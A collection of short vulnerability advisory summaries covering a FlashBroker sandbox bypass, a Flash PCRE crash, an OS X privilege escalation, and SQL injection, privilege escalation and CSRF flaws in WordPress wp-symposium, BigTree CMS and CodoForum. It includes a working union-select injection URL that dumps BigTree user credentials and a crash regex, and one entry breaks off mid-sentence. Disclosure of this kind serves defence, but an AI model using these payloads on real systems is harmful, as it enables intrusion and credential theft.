FlashBroker is vulnerable to NTFS junction attack to write an arbitrary file to the filesystem under user permissions. There is a bad check in FlashBroker BrokerCreateFile method and BrokerMoveFileEx method. FlashBroker uses CreateFile to open the destination folder for check. If CreateFile fails, the destination will be considered as a valid path. However, FlashBroker uses dwShareMode as 0 in CreateFile, which make CreateFile always fail if handle of the destination folder is held by other. The PoC writes calc.bat to startup folder. It has been tested by injecting the dll into 32-bit low integrity level IE process with Adobe Flash Player 16.0.0.305 (KB3021953) installed. It does not work in IE11 EPM as it needs to write normally to the temporary folder to setup the junction.
FlashBroker is vulnerable to NTFS junction attack to write an arbitrary file to the filesystem under user permissions. There is a bad check in FlashBroker BrokerCreateFile method and BrokerMoveFileEx method. FlashBroker only considers "" as delimiter. If the destination includes ""/""
There is an error in the PCRE engine version used in Flash that allows the execution of arbitrary PCRE bytecode, with potential for memory corruption and RCE. The issue occurs in the handling of zero-length assertions; ie assertions where the object of the assertion is prepended with the OP_BRAZERO operator. Simplest testcase that will crash in an ASAN build is the following: (?(?<a>)?)
This vulnerability allows an attacker to gain elevated privileges on OS X 10.10.5 systems. It was burned in 10.11. Full writeup is available at https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37825.zip
Wordpress plugin wp-symposium version 15.5.1 (and probably all existing previous versions) suffers from an unauthenticated SQL Injection in get_album_item.php parameter 'size'. The issue is exploitable even if the plugin is deactivated. The SQL injection allows (very easily) to retrieve all the database content, which includes users details and password hashes. An attacker may be able to crack users' password hashes and log in as them. If an administrator user password is obtained, then the attacker could take complete control of the Wordpress installation. Collected information may also allow further attacks.
An unauthenticated user can run blind sql injection of the site and extract password hashes and other information from the database.
Various components of the admin area of the BigTree CMS are vulnerable to SQL injection, which can lead to data leaks as well as compromisation of the host. Proof of Concept (Show all BigTree users): http://localhost//BigTree-CMS/site/index.php/admin/pages/view-tree/0' union all select 1,concat(email, ':', password),3,4,5,6,7,8,9,10 from bigtree_users %23/ Code: core/admin/modules/pages/view-tree.php:151; page id is user controlled $nav_visible = array_merge($admin->getNaturalNavigationByParent($page['id'],1),$admin->getPendingNavigationByParent($page['id'])); $nav_hidden = array_merge($admin->getHiddenNavigationByParent($page['id']),$admin->getPendingNavigationByParent($page['id'],'')); $nav_archived = $admin->getArchivedNavigationByParent($page['id']); core/inc/bigtree/admin.php:2638 static function getArchivedNavigationByParent($parent) { [...] $q = sqlquery('SELECT id,nav_title as title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views FROM bigtree_pages WHERE parent = '$parent' AND archived = 'on' ORDER BY position DESC');
There are two SQL injections in the CodoForum application. One is a blind injection which does not require any credentials, the other is a normal SQL injection which does require that the attacker be authenticated. These vulnerabilities can lead to data leaks as well as compromisation of the host.
We can elevate privileges from that of a regular user to an Admin level. In order for the attack to succeed and escalate privileges to become Admin you need know your ID for the 'id_usuario' field when executing the attack.
No CSRF token exists when creating user accounts, this allows us to exploit the application and add arbitrary users The ?PHPSESSID= cookie used in URL is useless as we can just replace the value with whatever.
Services By CQR